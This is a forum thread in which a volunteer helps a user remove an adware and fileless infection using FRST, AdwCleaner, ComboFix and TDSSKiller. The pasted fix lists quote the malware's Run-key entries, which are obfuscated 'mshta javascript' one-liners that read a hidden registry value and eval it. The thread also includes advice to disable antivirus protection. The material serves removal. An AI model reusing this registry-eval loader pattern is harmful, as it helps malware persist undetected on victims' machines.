Infection blocked Constant messages.

I keep getting the above. The message containes these:

URL: http://filter.infinity-info.com/filter?q={query&i=qsgAPfw0I1o_1&t=1204682193

Infection: URL:Mal2

Process: C:\Program Files\Internet Explorer\iexplore.exe

I have run Full Scan & Boot time scans. I uninstalled Internet Explorer from day one and even delete the contents of the Internet Explorer folder mentioned in the message bar for 2 dlls - ieproxy.dll & sqmapi.dll which I have been unable to remove even after taking ownership of them.

Would appreciate some advice on how to stop this nightmare. First time ever in many years of Avast use that I’ve
encountered such an issue.

Thanks

Joaquin

Could you screenshot the Avast popup please

Please download Farbar Recovery Scan Tool and save it to your Desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

[*]Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
[*]Select additions at the bottom
[*]Press Scan button.

https://dl.dropboxusercontent.com/u/73555776/frst.JPG

[*]It will produce a log called FRST.txt in the same directory the tool is run from.
[*]Please attach both logs generated.

Sorry for the delay getting back.
Logs and screenshot attached.

Thanks

Joaquin

This probably cam from one of your torrented movies

CAUTION : This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:

CreateRestorePoint: HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [**7963cd85<*>] => mshta javascript:cWaIf4Z="q7";I6X=new%20ActiveXObject("WScript.Shell");Yim1jLRE8="2DzVW7p1";q7ti3T=I6X.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");CxM0MaI0="p";eval(q7ti3T);Wn3p0erZkM (the data entry has 13 more characters). <===== ATTENTION (Value Name with invalid characters) HKLM-x32\...\Run: [**7963cd85<*>] => mshta javascript:cWaIf4Z="q7";I6X=new%20ActiveXObject("WScript.Shell");Yim1jLRE8="2DzVW7p1";q7ti3T=I6X.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");CxM0MaI0="p";eval(q7ti3T);Wn3p0erZkM (the data entry has 13 more characters). <===== ATTENTION (Value Name with invalid characters) HKLM\...\Policies\Explorer\Run: [**aefe7890<*>] => mshta javascript:LDvUT1uG="J4";bq3=new%20ActiveXObject("WScript.Shell");zKSEG9Se="hlG5kdljkX";Dc3K0E=bq3.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");klTB8VpgQ="q";eval(Dc3K0E);K5cW9em (the data entry has 14 more characters). <===== ATTENTION (Value Name with invalid characters) HKU\S-1-5-21-1306190550-1966074902-702322317-1000\...\Run: [EEDSpeedLauncher] => rundll32.exe C:\Windows\system32\eed_ec.dll,SpeedLauncher HKU\S-1-5-21-1306190550-1966074902-702322317-1000\...\Run: [**7963cd85<*>] => mshta javascript:WmyABn1BA0="YGDl";wN7=new%20ActiveXObject("WScript.Shell");Lpi4jqN4="UY3";qC4sm2=wN7.RegRead("HKCU\\software\\3ba89a97d2\\7d1deee2");TVDlVH1="BVV88jRnqS";eval(qC4sm2);QSLnTBa8F="ZfZml (the data entry has 6 more characters). <===== ATTENTION (Value Name with invalid characters) HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.mystartsearch.com/?type=hppp&ts=1423696213&from=smt&uid=WDCXWD1002FAEX-00Z3A0_WD-WCATR862249322493 SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.mystartsearch.com/web/?type=dspp&ts=1423696213&from=smt&uid=WDCXWD1002FAEX-00Z3A0_WD-WCATR862249322493&q={searchTerms} SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = http://www.mystartsearch.com/web/?type=dspp&ts=1423696213&from=smt&uid=WDCXWD1002FAEX-00Z3A0_WD-WCATR862249322493&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope value is missing SearchScopes: HKU\S-1-5-21-1306190550-1966074902-702322317-1000 -> {2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0} URL = http://www.mystartsearch.com/web/?utm_source=b&utm_medium=smt&utm_campaign=install_ie&utm_content=ds&from=smt&uid=WDCXWD1002FAEX-00Z3A0_WD-WCATR862249322493&ts=1423696235&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-1306190550-1966074902-702322317-1000 -> {B1C519C5-8E0B-4901-8A28-C3DEDC5AC32E} URL = http://www.mystartsearch.com/web/?utm_source=b&utm_medium=smt&utm_campaign=install_ie&utm_content=ds&from=smt&uid=WDCXWD1002FAEX-00Z3A0_WD-WCATR862249322493&ts=1423696235&type=default&q={searchTerms} SearchScopes: HKU\S-1-5-21-1306190550-1966074902-702322317-1000 -> {E733165D-CBCF-4FDA-883E-ADEF965B476C} URL = http://www.mystartsearch.com/web/?utm_source=b&utm_medium=smt&utm_campaign=install_ie&utm_content=ds&from=smt&uid=WDCXWD1002FAEX-00Z3A0_WD-WCATR862249322493&ts=1423696235&type=default&q={searchTerms} Toolbar: HKU\S-1-5-21-1306190550-1966074902-702322317-1000 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - No File Toolbar: HKU\S-1-5-21-1306190550-1966074902-702322317-1000 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File U3 aiiiti6k; C:\Windows\System32\Drivers\aiiiti6k.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder) DeleteKey: HKLM\software\Wow6432Node\3ba89a97d2 DeleteKey: HKCU\software\3ba89a97d2 RemoveProxy: EmptyTemp: CMD: bitsadmin /reset /allusers

Save this as fixlist.txt, in the same location as FRST.exe

https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG

Run FRST and press Fix
On completion a log will be generated please post that

Thanks for your help. I did as instructed and the log is attached. However pop up continue.

Joaquin

Could I have a fresh FRST scan please

Please download AdwCleaner by Xplode onto your desktop.

[*]Close all open programs and internet browsers.
[*]Double click on AdwCleaner.exe to run the tool.
[*]Click on Scan.
[*]After the scan is complete click on “Clean”
[*]Confirm each time with Ok.
[*]Your computer will be rebooted automatically. A text file will open after the restart.
[*]Please post the content of that logfile with your next answer.
[*]You can find the logfile at C:\AdwCleaner[S0].txt as well.

Done as instructed. See attached.

Much obliged for your help with all this.

Regards

Joaquin

Pop ups continue.

Hmm the exact same infection is showing, lets try once more

CAUTION : This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:

CreateRestorePoint: HKLM-x32\...\Run: [**7963cd85<*>] => mshta javascript:MM6YG3zKFz="UqC9I";m8g2=new%20ActiveXObject("WScript.Shell");GGMcA9Lr="uTNbxYW";RdsV89=m8g2.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");akfWMd2lF="4xtLoV7";eval(RdsV8 (the data entry has 19 more characters). <===== ATTENTION (Value Name with invalid characters) HKLM\...\Policies\Explorer\Run: [**aefe7890<*>] => mshta javascript:CY92tCCLnU="Oxlq5";k89k=new%20ActiveXObject("WScript.Shell");D1vHYMFcu="Vs";HUX4o5=k89k.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");q8CxhVuml="ox";eval(HUX4o5);WPSGc5 (the data entry has 10 more characters). <===== ATTENTION (Value Name with invalid characters) HKU\S-1-5-21-1306190550-1966074902-702322317-1000\...\Run: [**7963cd85<*>] => mshta javascript:KW3zbLY="Ecdu260TGk";c8K1=new%20ActiveXObject("WScript.Shell");VoHdg6jDS="ckvS2tBx";w1SX4s=c8K1.RegRead("HKCU\\software\\3ba89a97d2\\7d1deee2");NK6ft7kv="xoUxfLX7m";eval(w1SX4s);gP22F (the data entry has 19 more characters). <===== ATTENTION (Value Name with invalid characters) U3 ar5yet3c; C:\Windows\System32\Drivers\ar5yet3c.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder) HKU\S-1-5-21-1306190550-1966074902-702322317-1000\...\Run: [Amazon Music] => C:\Users\ideoplastic\AppData\Local\Amazon Music\Amazon Music Helper.exe [5887808 2015-07-21] () DeleteKey: HKLM\software\Wow6432Node\3ba89a97d2 DeleteKey: HKCU\software\3ba89a97d2 RemoveProxy: EmptyTemp: CMD: bitsadmin /reset /allusers

Save this as fixlist.txt, in the same location as FRST.exe

https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG

Run FRST and press Fix
On completion a log will be generated please post that

THEN

Download and Install Combofix

Download ComboFix from one of the following locations:
Link 1
Link 2

VERY IMPORTANT !!! Save ComboFix.exe to your Desktop

  • IMPORTANT - Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools. If you have difficulty properly disabling your protective programs, refer to this link here

[*]Double click on ComboFix.exe & follow the prompts.
[*]Accept the disclaimer and allow to update if it asks

http://img.photobucket.com/albums/v706/ried7/NSIS_disclaimer_ENG.png

http://img.photobucket.com/albums/v706/ried7/NSIS_extraction.png

[*]When finished, it shall produce a log for you.
[*]Please include the C:\ComboFix.txt in your next reply.

Notes:

  1. Do not mouse-click Combofix’s window while it is running. That may cause it to stall.
  2. Do not “re-run” Combofix. If you have a problem, reply back for further instructions.
  3. If after the reboot you get errors about programmes being marked for deletion then reboot, that will cure it.

Please make sure you include the combo fix log in your next reply as well as describe how your computer is running now

Followed the instructions to the letter. Did a FSRT scan and log file attached. Then ran ComboFix which scanned and then rebooted after completion, on returning to the Desktop another window opened and started to create a log file, unfortunately it came up with an error because of disk error, damaged or something like that. I was unable to take a screenshot because my was sort of frozen and had to reboot once more. I’ve only had one pop up for the last hour or so.

OK could I have a fresh FRST scan please so that I can be sure the malware has gone

Still getting pop-ups

Attached screenshot of pop-up and new Scan.

OK the only thing I can think of at the moment is that an MBR type rootkit is re-installing after I am removing it

So I will check that out. Are you downloading anything after running the FRST fix ?

Download the latest version of TDSSKiller from here and save it to your Desktop.

[*]Doubleclick on TDSSKiller.exe to run the application

https://dl.dropbox.com/u/73555776/tdss%20start.JPG

[*]Then click on Change parameters.

https://dl.dropbox.com/u/73555776/tdss%20Change%20param.JPG

[*]Check the boxes beside Verify Driver Digital Signature, Detect TDLFS file system and Use KSN to scan objects , then click OK.

[*]Click the Start Scan button.

[*]If a suspicious object is detected, the default action will be Skip, click on Continue.

https://dl.dropbox.com/u/73555776/tdss%20threat.JPG

[*]If malicious objects are found, they will show in the Scan results and offer three (3) options.
[*]Ensure Cure is selected, then click Continue => Reboot now to finish the cleaning process.

[*]Get the report by selecting Reports

https://dl.dropbox.com/u/73555776/tdss%20report.JPG

[*]Note: If Cure is not available, please choose Skip instead, do not choose Delete unless instructed.

Please copy and paste its contents on your next reply.

Nothing found but a pop up came up while it was scanning. - Probably best thing for me is to back-up and rebuild.

Extremely greatful for your help. If you were really in Essex I’d buy a pint!

Bests

Joaquin

Do you have anything on your system that is protecting the registry as that is where the malware is hiding

Sorry for the delay. I checked the services and Windows Defender was active so I switched it off, ran Adwcleaner followed by Combofix and after the reboots no more pop ups. All going well for a number of hours.

Thanks

Joaquin

Could you post the combofix log please and a fresh FRST

Sorry for the delay. Will post this evening when I get home.

Regards

Joaquin

I guess I shouted victory prematurely. Last night no pop ups appeared, but this evening they are back in force.

Attached the requested files.

Regards

Joaquin

This malware is normally monitored by a blank run key which is not showing in your logs. I wonder if they have now changed the monitor file.

Could you attach the combofix log as that should show any hidden entries

CAUTION : This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:

CreateRestorePoint: HKLM-x32\...\Run: [WinampAgent] => "C:\Program Files (x86)\Winamp\winampa.exe" HKLM-x32\...\Run: [**7963cd85<*>] => mshta javascript:WxBVRTj8="uA9IbaM";By8=new%20ActiveXObject("WScript.Shell");uFAG7tSc="q";Xp9rl=By8.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");PvrlG9gl="ibKw";eval(Xp9rl);ZQiPL1Nj7=" (the data entry has 3 more characters). <===== ATTENTION (Value Name with invalid characters) Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation) HKLM\...\Policies\Explorer\Run: [**aefe7890<*>] => mshta javascript:UxeT5lmg="jmSAvJRzh";Y0Z3=new%20ActiveXObject("WScript.Shell");gNq4NQ5BS="b7s0";y8tY6J=Y0Z3.RegRead("HKLM\\software\\Wow6432Node\\3ba89a97d2\\7d1deee2");o8L2EIQxFQ="eny9";eval(y8tY6J) (the data entry has 22 more characters). <===== ATTENTION (Value Name with invalid characters) HKU\S-1-5-21-1306190550-1966074902-702322317-1000\...\Run: [**7963cd85<*>] => mshta javascript:IZZV6c3B="iVQKNdj6Kx";oU6=new%20ActiveXObject("WScript.Shell");m7OBrFG="yABojYeU";UvI7n=oU6.RegRead("HKCU\\software\\3ba89a97d2\\7d1deee2");imRn88mkR="nGnZ5Wx";eval(UvI7n);b1TtfvD="qe (the data entry has 8 more characters). <===== ATTENTION (Value Name with invalid characters) HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION HKU\S-1-5-21-1306190550-1966074902-702322317-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION U3 a16ip6jg; C:\Windows\System32\Drivers\a16ip6jg.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder) 2015-07-27 20:54 - 2015-07-27 20:58 - 00000000 ____D C:\Users\ideoplastic\AppData\OICE_15_974FA576_32C1D314_2688 2015-07-27 20:54 - 2015-07-27 20:54 - 00000000 ____D C:\Users\ideoplastic\AppData\OICE_15_974FA576_32C1D314_3418 2015-07-26 09:22 - 2015-07-26 09:22 - 00685200 _____ () C:\Users\ideoplastic\Downloads\setup.exe Task: {6D0F3D86-B01F-4AA2-9771-0552DF52FA5C} - System32\Tasks\Amazon Music Helper => C:\Users\ideoplastic\AppData\Local\Amazon Music\Amazon Music Helper.exe [2015-07-21] () C:\Windows\System32\Drivers\a16ip6jg.sys DeleteKey: HKCU\software\3ba89a97d2 DeleteKey: HKLM\\software\Wow6432Node\3ba89a97d2 RemoveProxy: EmptyTemp: CMD: bitsadmin /reset /allusers

Save this as fixlist.txt, in the same location as FRST.exe

https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG

Run FRST and press Fix
On completion a log will be generated please post that

Thanks.

Combofix refuses to create a log and the Fix’s logs also attached.

Regards

No pop-ups so far since turning on PC 1:15 minutes ago.!